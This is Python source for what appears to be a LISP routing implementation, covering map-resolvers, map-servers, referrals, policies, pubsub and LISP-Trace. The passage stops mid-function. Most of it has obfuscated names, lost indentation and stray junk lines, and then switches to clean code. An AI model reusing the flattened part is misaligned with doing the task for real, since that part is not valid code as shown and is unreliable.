for OOOoOoo in self . registered_rlocs :
if ( OOOoOoo . is_rtr ( ) ) : return ( True )
return ( False )
def is_rtr_in_rloc_set ( self , rtr_rloc ) :
for OOOoOoo in self . registered_rlocs :
if ( OOOoOoo . rloc . is_exact_match ( rtr_rloc ) == False ) : continue
if ( OOOoOoo . is_rtr ( ) ) : return ( True )
return ( False )
def is_rloc_in_rloc_set ( self , rloc ) :
for OOOoOoo in self . registered_rlocs :
if ( OOOoOoo . rle ) :
for ooo0o0O in OOOoOoo . rle . rle_nodes :
if ( ooo0o0O . address . is_exact_match ( rloc ) ) : return ( True )
if ( OOOoOoo . rloc . is_exact_match ( rloc ) ) : return ( True )
return ( False )
def do_rloc_sets_match ( self , prev_rloc_set ) :
if ( len ( self . registered_rlocs ) != len ( prev_rloc_set ) ) : return ( False )
for OOOoOoo in prev_rloc_set :
ii1II1i1 = OOOoOoo . rloc
if ( self . is_rloc_in_rloc_set ( ii1II1i1 ) == False ) : return ( False )
return ( True )
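#
# A map-resolver the xTR sends Map-Requests to. When configured by DNS
# name the address is resolved and periodically re-resolved rather
# than set statically.
#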
class lisp_mr ( object ) :
def __init__ ( self , addr_str , dns_name , mr_name ) :
self . mr_name = mr_name if ( mr_name != None ) else "all"
self . dns_name = dns_name
self . map_resolver = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( addr_str ) :
self . map_resolver . store_address ( addr_str )
self . insert_mr ( )
else :
self . resolve_dns_name ( )
self . last_used = 0
self . last_reply = 0
self . last_nonce = 0
self . map_requests_sent = 0
self . neg_map_replies_received = 0
self . total_rtt = 0
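#
# resolve_dns_name() re-resolves the map-resolver's DNS name, at most
# once every 30 seconds. For a lisp_is_decent_dns_suffix() name, extra
# A records create additional lisp_mr entries, and entries whose
# addresses left the answer are deleted.
#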
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
try :
ooo0o0 = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
OO0oo0o0 = ooo0o0 [ 2 ]
except :
return
if ( len ( OO0oo0o0 ) <= self . a_record_index ) :
self . delete_mr ( )
return
IiI = OO0oo0o0 [ self . a_record_index ]
if ( IiI != self . map_resolver . print_address_no_iid ( ) ) :
self . delete_mr ( )
self . map_resolver . store_address ( IiI )
self . insert_mr ( )
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
for IiI in OO0oo0o0 [ 1 : : ] :
OO0O00o0 = lisp_address ( LISP_AFI_NONE , IiI , 0 , 0 )
iii1i = lisp_get_map_resolver ( OO0O00o0 , None )
if ( iii1i != None and iii1i . a_record_index == OO0oo0o0 . index ( IiI ) ) :
continue
iii1i = lisp_mr ( IiI , None , None )
iii1i . a_record_index = OO0oo0o0 . index ( IiI )
iii1i . dns_name = self . dns_name
iii1i . last_dns_resolve = lisp_get_timestamp ( )
iIi1II1IiI1I = [ ]
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
if ( self . dns_name != iii1i . dns_name ) : continue
OO0O00o0 = iii1i . map_resolver . print_address_no_iid ( )
if ( OO0O00o0 in OO0oo0o0 ) : continue
iIi1II1IiI1I . append ( iii1i )
for iii1i in iIi1II1IiI1I : iii1i . delete_mr ( )
def insert_mr ( self ) :
III = self . mr_name + self . map_resolver . print_address ( )
lisp_map_resolvers_list [ III ] = self
def delete_mr ( self ) :
III = self . mr_name + self . map_resolver . print_address ( )
if ( III not in lisp_map_resolvers_list ) : return
lisp_map_resolvers_list . pop ( III )
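#
# A configured DDT root node: address, public key, and
# priority/weight.
#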
class lisp_ddt_root ( object ) :
def __init__ ( self ) :
self . root_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . priority = 0
self . weight = 0
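#
# A referral cache entry learned from Map-Referral messages: the
# referred EID-prefix, the set of referral nodes, and the action/TTL
# state that controls how long it is used.
#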
class lisp_referral ( object ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_set = { }
self . referral_type = LISP_DDT_ACTION_NULL
self . referral_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_ttl = 0
self . uptime = lisp_get_timestamp ( )
self . expires = 0
self . source_cache = None
def print_referral ( self , eid_indent , referral_indent ) :
oo0Ooo0o00OO = lisp_print_elapsed ( self . uptime )
ii1iIi = lisp_print_future ( self . expires )
lprint ( "{}Referral EID {}, uptime/expires {}/{}, {} referrals:" . format ( eid_indent , green ( self . eid . print_prefix ( ) , False ) , oo0Ooo0o00OO ,
ii1iIi , len ( self . referral_set ) ) )
for oooO00ooo00 in list ( self . referral_set . values ( ) ) :
oooO00ooo00 . print_ref_node ( referral_indent )
def print_referral_type ( self ) :
if ( self . eid . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( "root" )
if ( self . referral_type == LISP_DDT_ACTION_NULL ) :
return ( "null-referral" )
if ( self . referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
return ( "no-site-action" )
if ( self . referral_type > LISP_DDT_ACTION_MAX ) :
return ( "invalid-action" )
return ( lisp_map_referral_action_string [ self . referral_type ] )
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
def print_ttl ( self ) :
O0O00O = self . referral_ttl
if ( O0O00O < 60 ) : return ( str ( O0O00O ) + " secs" )
if ( ( O0O00O % 60 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 60 ) ) + " mins"
else :
O0O00O = str ( O0O00O ) + " secs"
return ( O0O00O )
def is_referral_negative ( self ) :
return ( self . referral_type in ( LISP_DDT_ACTION_MS_NOT_REG , LISP_DDT_ACTION_DELEGATION_HOLE ,
LISP_DDT_ACTION_NOT_AUTH ) )
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . add_cache ( self . eid , self )
else :
O0oO0 = lisp_referral_cache . lookup_cache ( self . group , True )
if ( O0oO0 == None ) :
O0oO0 = lisp_referral ( )
O0oO0 . eid . copy_address ( self . group )
O0oO0 . group . copy_address ( self . group )
lisp_referral_cache . add_cache ( self . group , O0oO0 )
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( O0oO0 . group )
O0oO0 . add_source_entry ( self )
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . delete_cache ( self . eid )
else :
O0oO0 = lisp_referral_cache . lookup_cache ( self . group , True )
if ( O0oO0 == None ) : return
o000oOoO = O0oO0 . lookup_source_cache ( self . eid , True )
if ( o000oOoO == None ) : return
O0oO0 . source_cache . delete_cache ( self . eid )
if ( O0oO0 . source_cache . cache_size ( ) == 0 ) :
lisp_referral_cache . delete_cache ( self . group )
def add_source_entry ( self , source_ref ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ref . eid , source_ref )
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
class lisp_referral_node ( object ) :
def __init__ ( self ) :
self . referral_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . priority = 0
self . weight = 0
self . updown = True
self . map_requests_sent = 0
self . no_responses = 0
self . uptime = lisp_get_timestamp ( )
def print_ref_node ( self , indent ) :
i1 = lisp_print_elapsed ( self . uptime )
lprint ( "{}referral {}, uptime {}, {}, priority/weight: {}/{}" . format ( indent , red ( self . referral_address . print_address ( ) , False ) , i1 ,
"up" if self . updown else "down" , self . priority , self . weight ) )
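#
# A configured map-server: authentication and registration options for
# Map-Registers, counters, and the same DNS-name resolution behavior
# as lisp_mr.
#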
class lisp_ms ( object ) :
def __init__ ( self , addr_str , dns_name , ms_name , alg_id , key_id , pw , pr ,
mr , rr , wmn , site_id , ekey_id , ekey ) :
self . ms_name = ms_name if ( ms_name != None ) else "all"
self . dns_name = dns_name
self . map_server = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( lisp_map_servers_list == { } ) :
self . xtr_id = lisp_get_control_nonce ( )
else :
self . xtr_id = list ( lisp_map_servers_list . values ( ) ) [ 0 ] . xtr_id
self . alg_id = alg_id
self . key_id = key_id
self . password = pw
self . proxy_reply = pr
self . merge_registrations = mr
self . refresh_registrations = rr
self . want_map_notify = wmn
self . site_id = site_id
self . map_registers_sent = 0
self . map_registers_multicast_sent = 0
self . map_notifies_received = 0
self . map_notify_acks_sent = 0
self . ekey_id = ekey_id
self . ekey = ekey
if ( addr_str ) :
self . map_server . store_address ( addr_str )
self . insert_ms ( )
else :
self . resolve_dns_name ( )
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
try :
ooo0o0 = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
OO0oo0o0 = ooo0o0 [ 2 ]
except :
return
if ( len ( OO0oo0o0 ) <= self . a_record_index ) :
self . delete_ms ( )
return
IiI = OO0oo0o0 [ self . a_record_index ]
if ( IiI != self . map_server . print_address_no_iid ( ) ) :
self . delete_ms ( )
self . map_server . store_address ( IiI )
self . insert_ms ( )
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
for IiI in OO0oo0o0 [ 1 : : ] :
OO0O00o0 = lisp_address ( LISP_AFI_NONE , IiI , 0 , 0 )
oO00000oOO = lisp_get_map_server ( OO0O00o0 )
if ( oO00000oOO != None and oO00000oOO . a_record_index == OO0oo0o0 . index ( IiI ) ) :
continue
oO00000oOO = copy . deepcopy ( self )
oO00000oOO . map_server . store_address ( IiI )
oO00000oOO . a_record_index = OO0oo0o0 . index ( IiI )
oO00000oOO . last_dns_resolve = lisp_get_timestamp ( )
oO00000oOO . insert_ms ( )
iIi1II1IiI1I = [ ]
for oO00000oOO in list ( lisp_map_servers_list . values ( ) ) :
if ( self . dns_name != oO00000oOO . dns_name ) : continue
OO0O00o0 = oO00000oOO . map_server . print_address_no_iid ( )
if ( OO0O00o0 in OO0oo0o0 ) : continue
iIi1II1IiI1I . append ( oO00000oOO )
for oO00000oOO in iIi1II1IiI1I : oO00000oOO . delete_ms ( )
def insert_ms ( self ) :
III = self . ms_name + self . map_server . print_address ( )
lisp_map_servers_list [ III ] = self
def delete_ms ( self ) :
III = self . ms_name + self . map_server . print_address ( )
if ( III not in lisp_map_servers_list ) : return
lisp_map_servers_list . pop ( III )
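#
# Per-interface state: optional instance-id, a dynamic-EID prefix for
# discovery on this interface, and raw/bridge sockets used to forward
# packets out the device.
#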
class lisp_interface ( object ) :
def __init__ ( self , device ) :
self . interface_name = ""
self . device = device
self . instance_id = None
self . bridge_socket = None
self . raw_socket = None
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dynamic_eid_device = None
self . dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self . multi_tenant_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
def add_interface ( self ) :
lisp_myinterfaces [ self . device ] = self
def get_instance_id ( self ) :
return ( self . instance_id )
def get_socket ( self ) :
return ( self . raw_socket )
def get_bridge_socket ( self ) :
return ( self . bridge_socket )
def does_dynamic_eid_match ( self , eid ) :
if ( self . dynamic_eid . is_null ( ) ) : return ( False )
return ( eid . is_more_specific ( self . dynamic_eid ) )
def set_socket ( self , device ) :
I111 = socket . socket ( socket . AF_INET , socket . SOCK_RAW , socket . IPPROTO_RAW )
I111 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
try :
I111 . setsockopt ( socket . SOL_SOCKET , socket . SO_BINDTODEVICE , device )
except :
I111 . close ( )
I111 = None
self . raw_socket = I111
def set_bridge_socket ( self , device ) :
I111 = socket . socket ( socket . PF_PACKET , socket . SOCK_RAW )
try :
I111 . bind ( ( device , 0 ) )
self . bridge_socket = I111
except :
return
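#
# Wrapper for "year-month-day-hour:min:sec" strings used in policy
# match clauses; parse_datetime() strips the punctuation and stores
# the digits as an integer so datetimes compare chronologically.
#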
class lisp_datetime ( object ) :
def __init__ ( self , datetime_str ) :
self . datetime_name = datetime_str
self . datetime = None
self . parse_datetime ( )
def valid_datetime ( self ) :
o0o0OO = self . datetime_name
if ( o0o0OO . find ( ":" ) == - 1 ) : return ( False )
if ( o0o0OO . find ( "-" ) == - 1 ) : return ( False )
ii1iiii1i1II1 , oOOOOOo00 , i1O0oOO , time_of_day = o0o0OO [ 0 : 4 ] , o0o0OO [ 5 : 7 ] , o0o0OO [ 8 : 10 ] , o0o0OO [ 11 : : ]
if ( ( ii1iiii1i1II1 + oOOOOOo00 + i1O0oOO ) . isdigit ( ) == False ) : return ( False )
if ( oOOOOOo00 < "01" or oOOOOOo00 > "12" ) : return ( False )
if ( i1O0oOO < "01" or i1O0oOO > "31" ) : return ( False )
I1I11Ii , OoI1 , oooO0OOO0OoO = time_of_day . split ( ":" )
if ( ( I1I11Ii + OoI1 + oooO0OOO0OoO ) . isdigit ( ) == False ) : return ( False )
if ( I1I11Ii < "00" or I1I11Ii > "23" ) : return ( False )
if ( OoI1 < "00" or OoI1 > "59" ) : return ( False )
if ( oooO0OOO0OoO < "00" or oooO0OOO0OoO > "59" ) : return ( False )
return ( True )
def parse_datetime ( self ) :
oOOoo0o0OOOo = self . datetime_name
oOOoo0o0OOOo = oOOoo0o0OOOo . replace ( "-" , "" )
oOOoo0o0OOOo = oOOoo0o0OOOo . replace ( ":" , "" )
self . datetime = int ( oOOoo0o0OOOo )
def now ( self ) :
i1 = datetime . datetime . now ( ) . strftime ( "%Y-%m-%d-%H:%M:%S" )
i1 = lisp_datetime ( i1 )
return ( i1 )
def print_datetime ( self ) :
return ( self . datetime_name )
def future ( self ) :
return ( self . datetime > self . now ( ) . datetime )
def past ( self ) :
return ( self . future ( ) == False )
def now_in_range ( self , upper ) :
return ( self . past ( ) and upper . future ( ) )
def this_year ( self ) :
O000oo = str ( self . now ( ) . datetime ) [ 0 : 4 ]
i1 = str ( self . datetime ) [ 0 : 4 ]
return ( i1 == O000oo )
def this_month ( self ) :
O000oo = str ( self . now ( ) . datetime ) [ 0 : 6 ]
i1 = str ( self . datetime ) [ 0 : 6 ]
return ( i1 == O000oo )
def today ( self ) :
O000oo = str ( self . now ( ) . datetime ) [ 0 : 8 ]
i1 = str ( self . datetime ) [ 0 : 8 ]
return ( i1 == O000oo )
class lisp_policy_match ( object ) :
def __init__ ( self ) :
self . source_eid = None
self . dest_eid = None
self . source_rloc = None
self . dest_rloc = None
self . rloc_record_name = None
self . geo_name = None
self . elp_name = None
self . rle_name = None
self . json_name = None
self . datetime_lower = None
self . datetime_upper = None
class lisp_policy ( object ) :
def __init__ ( self , policy_name ) :
self . policy_name = policy_name
self . match_clauses = [ ]
self . set_action = None
self . set_record_ttl = None
self . set_source_eid = None
self . set_dest_eid = None
self . set_rloc_address = None
self . set_rloc_record_name = None
self . set_geo_name = None
self . set_elp_name = None
self . set_rle_name = None
self . set_json_name = None
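#
# match_policy_map_request() returns True if any one match clause
# accepts the Map-Request: source-EID, dest-EID, source-RLOC, and
# datetime-range tests must all pass within the same clause.
#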
def match_policy_map_request ( self , mr , srloc ) :
for IiIIIIi11ii in self . match_clauses :
iIIiiIi = IiIIIIi11ii . source_eid
IIiIIiiiiI = mr . source_eid
if ( iIIiiIi and IIiIIiiiiI and IIiIIiiiiI . is_more_specific ( iIIiiIi ) == False ) : continue
iIIiiIi = IiIIIIi11ii . dest_eid
IIiIIiiiiI = mr . target_eid
if ( iIIiiIi and IIiIIiiiiI and IIiIIiiiiI . is_more_specific ( iIIiiIi ) == False ) : continue
iIIiiIi = IiIIIIi11ii . source_rloc
IIiIIiiiiI = srloc
if ( iIIiiIi and IIiIIiiiiI and IIiIIiiiiI . is_more_specific ( iIIiiIi ) == False ) : continue
oOO0O00o0O0 = IiIIIIi11ii . datetime_lower
ii11IIiI1iIi = IiIIIIi11ii . datetime_upper
if ( oOO0O00o0O0 and ii11IIiI1iIi and oOO0O00o0O0 . now_in_range ( ii11IIiI1iIi ) == False ) : continue
return ( True )
return ( False )
def set_policy_map_reply ( self ) :
o00oo = ( self . set_rloc_address == None and
self . set_rloc_record_name == None and self . set_geo_name == None and
self . set_elp_name == None and self . set_rle_name == None )
if ( o00oo ) : return ( None )
iIIiI11 = lisp_rloc ( )
if ( self . set_rloc_address ) :
iIIiI11 . rloc . copy_address ( self . set_rloc_address )
IiI = iIIiI11 . rloc . print_address_no_iid ( )
lprint ( "Policy set-rloc-address to {}" . format ( IiI ) )
if ( self . set_rloc_record_name ) :
iIIiI11 . rloc_name = self . set_rloc_record_name
ooO0o = blue ( iIIiI11 . rloc_name , False )
lprint ( "Policy set-rloc-record-name to {}" . format ( ooO0o ) )
if ( self . set_geo_name ) :
iIIiI11 . geo_name = self . set_geo_name
ooO0o = iIIiI11 . geo_name
iI1IIi1Ii = "" if ( ooO0o in lisp_geo_list ) else "(not configured)"
lprint ( "Policy set-geo-name '{}' {}" . format ( ooO0o , iI1IIi1Ii ) )
if ( self . set_elp_name ) :
iIIiI11 . elp_name = self . set_elp_name
ooO0o = iIIiI11 . elp_name
iI1IIi1Ii = "" if ( ooO0o in lisp_elp_list ) else "(not configured)"
lprint ( "Policy set-elp-name '{}' {}" . format ( ooO0o , iI1IIi1Ii ) )
if ( self . set_rle_name ) :
iIIiI11 . rle_name = self . set_rle_name
ooO0o = iIIiI11 . rle_name
iI1IIi1Ii = "" if ( ooO0o in lisp_rle_list ) else "(not configured)"
lprint ( "Policy set-rle-name '{}' {}" . format ( ooO0o , iI1IIi1Ii ) )
if ( self . set_json_name ) :
iIIiI11 . json_name = self . set_json_name
ooO0o = iIIiI11 . json_name
iI1IIi1Ii = "" if ( ooO0o in lisp_json_list ) else "(not configured)"
lprint ( "Policy set-json-name '{}' {}" . format ( ooO0o , iI1IIi1Ii ) )
return ( iIIiI11 )
def save_policy ( self ) :
lisp_policies [ self . policy_name ] = self
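#
# Pubsub subscription state: which ITR asked to be notified about an
# EID-prefix, keyed by xtr-id in lisp_pubsub_cache, with a TTL and a
# count of Map-Notify messages sent.
#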
class lisp_pubsub ( object ) :
def __init__ ( self , itr , port , nonce , ttl , xtr_id ) :
self . itr = itr
self . port = port
self . nonce = nonce
self . uptime = lisp_get_timestamp ( )
self . ttl = ttl
self . xtr_id = xtr_id
self . map_notify_count = 0
self . eid_prefix = None
def add ( self , eid_prefix ) :
self . eid_prefix = eid_prefix
O0O00O = self . ttl
o0Ooo0Oooo0o = eid_prefix . print_prefix ( )
if ( o0Ooo0Oooo0o not in lisp_pubsub_cache ) :
lisp_pubsub_cache [ o0Ooo0Oooo0o ] = { }
iIiI1IIi1Ii1i = lisp_pubsub_cache [ o0Ooo0Oooo0o ]
O0Ooo0iII111III = "Add"
if ( self . xtr_id in iIiI1IIi1Ii1i ) :
O0Ooo0iII111III = "Replace"
del ( iIiI1IIi1Ii1i [ self . xtr_id ] )
iIiI1IIi1Ii1i [ self . xtr_id ] = self
o0Ooo0Oooo0o = green ( o0Ooo0Oooo0o , False )
oO0oO00OO00 = red ( self . itr . print_address_no_iid ( ) , False )
oOOOOOo0OO0o0oOO0 = "0x" + lisp_hex_string ( self . xtr_id )
lprint ( "{} pubsub state {} for {}, xtr-id: {}, ttl {}" . format ( O0Ooo0iII111III , o0Ooo0Oooo0o ,
oO0oO00OO00 , oOOOOOo0OO0o0oOO0 , O0O00O ) )
def delete ( self , eid_prefix ) :
o0Ooo0Oooo0o = eid_prefix . print_prefix ( )
oO0oO00OO00 = red ( self . itr . print_address_no_iid ( ) , False )
oOOOOOo0OO0o0oOO0 = "0x" + lisp_hex_string ( self . xtr_id )
if ( o0Ooo0Oooo0o in lisp_pubsub_cache ) :
iIiI1IIi1Ii1i = lisp_pubsub_cache [ o0Ooo0Oooo0o ]
if ( self . xtr_id in iIiI1IIi1Ii1i ) :
iIiI1IIi1Ii1i . pop ( self . xtr_id )
lprint ( "Remove pubsub state {} for {}, xtr-id: {}" . format ( o0Ooo0Oooo0o ,
oO0oO00OO00 , oOOOOOo0OO0o0oOO0 ) )
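#
# LISP-Trace support: encodes and decodes trace packets that carry a
# JSON hop list, and caches NAT-translated return addresses so an RTR
# can send the trace back through the translator.
#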
class lisp_trace ( object ) :
def __init__ ( self ) :
self . nonce = lisp_get_control_nonce ( )
self . packet_json = [ ]
self . local_rloc = None
self . local_port = None
self . lisp_socket = None
def print_trace ( self ) :
iIiI11II = self . packet_json
lprint ( "LISP-Trace JSON: '{}'" . format ( iIiI11II ) )
def encode ( self ) :
iIiIii = socket . htonl ( 0x90000000 )
Oo00oo = struct . pack ( "II" , iIiIii , 0 )
Oo00oo += struct . pack ( "Q" , self . nonce )
Oo00oo += json . dumps ( self . packet_json )
return ( Oo00oo )
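#
# decode() parses a LISP-Trace packet: a first word carrying type byte
# 0x90 and the local port in the low 16 bits, a local-RLOC word, a
# 64-bit nonce, then an optional JSON body. Returns False on any
# length or format error.
#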
def decode ( self , packet ) :
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( False )
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
iIiIii = socket . ntohl ( iIiIii )
if ( ( iIiIii & 0xff000000 ) != 0x90000000 ) : return ( False )
if ( len ( packet ) < ooo0000oo0 ) : return ( False )
IiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
IiI = socket . ntohl ( IiI )
OOoOO = IiI >> 24
O000O00O0O = ( IiI >> 16 ) & 0xff
iiOOoooO = ( IiI >> 8 ) & 0xff
OOO0O00oo = IiI & 0xff
self . local_rloc = "{}.{}.{}.{}" . format ( OOoOO , O000O00O0O , iiOOoooO , OOO0O00oo )
self . local_port = str ( iIiIii & 0xffff )
if 76 - 76: I11i % I1Ii111 % iII111i + IiII * iII111i + OoOoOO00
iiII1iiI = "Q"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( False )
self . nonce = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
if ( len ( packet ) == 0 ) : return ( True )
if 83 - 83: OOooOOo . ooOoO0o / IiII
try :
self . packet_json = json . loads ( packet )
except :
return ( False )
if 80 - 80: I1Ii111 . I11i - I11i + I1ii11iIi11i
return ( True )
if 42 - 42: I11i / IiII % O0 - Oo0Ooo
if 33 - 33: I1Ii111
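    #
    # Return True when 'eid' is one of our own EIDs.
    #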
    def myeid(self, eid):
        return(lisp_is_myeid(eid))
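    #
    # Send a LISP-Trace packet back to the address and port encoded in
    # 'rts_rloc', preferring a translated address from the RTR's NAT trace
    # cache when one exists.
    #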
    def return_to_sender(self, lisp_socket, rts_rloc, packet):
        addr_str, port = self.rtr_cache_nat_trace_find(rts_rloc)
        if (addr_str == None):
            addr_str, port = rts_rloc.split(":")
            port = int(port)
            lprint("Send LISP-Trace to address {}:{}".format(addr_str, port))
        else:
            lprint("Send LISP-Trace to translated address {}:{}".format(
                addr_str, port))

        if (lisp_socket == None):
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            send_socket.bind(("0.0.0.0", LISP_TRACE_PORT))
            send_socket.sendto(packet, (addr_str, port))
            send_socket.close()
        else:
            lisp_socket.sendto(packet, (addr_str, port))
    def packet_length(self):
        udp = 8; header = 4 + 4 + 8
        return(udp + header + len(json.dumps(self.packet_json)))
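    #
    # Cache, keyed by "local-rloc:local-port", the translated address and
    # port an RTR should use to return LISP-Trace packets through a NAT.
    #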
    def rtr_cache_nat_trace(self, translated_rloc, translated_port):
        key = self.local_rloc + ":" + self.local_port
        value = (translated_rloc, translated_port)
        lisp_rtr_nat_trace_cache[key] = value
        lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
    def rtr_cache_nat_trace_find(self, local_rloc_and_port):
        key = local_rloc_and_port
        try: value = lisp_rtr_nat_trace_cache[key]
        except: value = (None, None)
        return(value)
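#
# lisp_get_map_server
#
# Return the lisp_map_servers_list entry whose map-server address exactly
# matches the supplied address, or None.
#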
def lisp_get_map_server(address):
    for ms in list(lisp_map_servers_list.values()):
        if (ms.map_server.is_exact_match(address)): return(ms)
    return(None)
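#
# lisp_get_any_map_server
#
# Return the first configured map-server entry, or None if none exist.
#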
def lisp_get_any_map_server():
    for ms in list(lisp_map_servers_list.values()): return(ms)
    return(None)
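#
# lisp_get_map_resolver
#
# Select a map-resolver. When an address is supplied, return the entry it
# names. Otherwise choose by mr-name: "" matches any resolver, an EID of
# None selects name "all", and any other EID uses the mr-name from its
# matching database-mapping. Among candidates, the least recently used
# resolver wins.
#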
def lisp_get_map_resolver(address, eid):

    #
    # An explicit address selects the map-resolver it names.
    #
    if (address != None):
        addr_str = address.print_address()
        mr = None
        for key in lisp_map_resolvers_list:
            if (key.find(addr_str) == -1): continue
            mr = lisp_map_resolvers_list[key]
        return(mr)

    #
    # Otherwise map the EID argument to an mr-name to search for.
    #
    if (eid == ""):
        mr_name = ""
    elif (eid == None):
        mr_name = "all"
    else:
        db = lisp_db_for_lookups.lookup_cache(eid, False)
        mr_name = "all" if db == None else db.use_mr_name

    best_mr = None
    for mr in list(lisp_map_resolvers_list.values()):
        if (mr_name == ""): return(mr)
        if (mr.mr_name != mr_name): continue
        if (best_mr == None or mr.last_used < best_mr.last_used): best_mr = mr
    return(best_mr)
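#
# lisp_get_decent_map_resolver
#
# For LISP-Decent, hash the EID to an index and pick the least recently used
# map-resolver whose DNS name is "<index>.<lisp_decent_dns_suffix>".
#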
def lisp_get_decent_map_resolver(eid):
    index = lisp_get_decent_index(eid)
    dns_name = str(index) + "." + lisp_decent_dns_suffix

    lprint("Use LISP-Decent map-resolver {} for EID {}".format(
        bold(dns_name, False), eid.print_prefix()))

    best_mr = None
    for mr in list(lisp_map_resolvers_list.values()):
        if (dns_name != mr.dns_name): continue
        if (best_mr == None or mr.last_used < best_mr.last_used): best_mr = mr
    return(best_mr)
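#
# lisp_ipv4_input
#
# Validate the IPv4 inner header of a packet about to be encapsulated:
# verify the header checksum, discard on ttl 0 or ttl expiry, then decrement
# the ttl and rewrite the checksum. Returns [True, packet] for IGMP
# (protocol 2) so the caller can handle it specially, and
# [False, packet-or-None] otherwise.
#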
def lisp_ipv4_input(packet):

    #
    # IGMP packets (protocol 2) are returned to the caller unmodified.
    #
    if (ord(packet[9:10]) == 2): return([True, packet])

    #
    # Verify the IPv4 header checksum of the inner header.
    #
    checksum = struct.unpack("H", packet[10:12])[0]
    if (checksum == 0):
        dprint("Packet arrived with checksum of 0!")
    else:
        packet = lisp_ip_checksum(packet)
        checksum = struct.unpack("H", packet[10:12])[0]
        if (checksum != 0):
            dprint("IPv4 header checksum failed for inner header")
            packet = lisp_format_packet(packet[0:20])
            dprint("Packet header: {}".format(packet))
            return([False, None])

    #
    # Check the ttl before decrementing it.
    #
    ttl = struct.unpack("B", packet[8:9])[0]
    if (ttl == 0):
        dprint("IPv4 packet arrived with ttl 0, packet discarded")
        return([False, None])
    elif (ttl == 1):
        dprint("IPv4 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return([False, None])

    #
    # Decrement the ttl, zero the checksum field, and recompute it.
    #
    ttl -= 1
    packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
    packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
    packet = lisp_ip_checksum(packet)
    return([False, packet])
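#
# lisp_ipv6_input
#
# Validate the IPv6 inner header: discard on hop-limit 0 or expiry, refuse
# to encapsulate link-local destinations, then decrement the hop-limit.
# Returns the updated packet, or None when it should be discarded.
#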
def lisp_ipv6_input(packet):
    dest = packet.inner_dest
    packet = packet.packet

    #
    # Check the hop-limit before decrementing it.
    #
    hop_limit = struct.unpack("B", packet[7:8])[0]
    if (hop_limit == 0):
        dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
        return(None)
    elif (hop_limit == 1):
        dprint("IPv6 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return(None)

    #
    # Never encapsulate packets destined to link-local addresses.
    #
    if (dest.is_ipv6_link_local()):
        dprint("Do not encapsulate IPv6 link-local packets")
        return(None)

    hop_limit -= 1
    packet = packet[0:7] + struct.pack("B", hop_limit) + packet[8::]
    return(packet)
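#
# lisp_mac_input
#
# MAC frames need no inner-header adjustments before encapsulation.
#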
def lisp_mac_input(packet):
    return(packet)
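#
# lisp_rate_limit_map_request
#
# Decide whether a Map-Request for 'dest' should be suppressed.
# Rate-limiting is skipped for LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME seconds
# after lisp_no_map_request_rate_limit was set; after that, a request is
# suppressed when the previous one was sent less than
# LISP_MAP_REQUEST_RATE_LIMIT seconds ago. Returns True to rate-limit.
#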
def lisp_rate_limit_map_request(dest):
    now = lisp_get_timestamp()

    #
    # Honor the no-rate-limit grace period.
    #
    elapsed = now - lisp_no_map_request_rate_limit
    if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
        left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
        dprint("No Rate-Limit Mode for another {} secs".format(left))
        return(False)

    #
    # Compare against the time the last Map-Request was sent.
    #
    if (lisp_last_map_request_sent == None): return(False)
    elapsed = now - lisp_last_map_request_sent
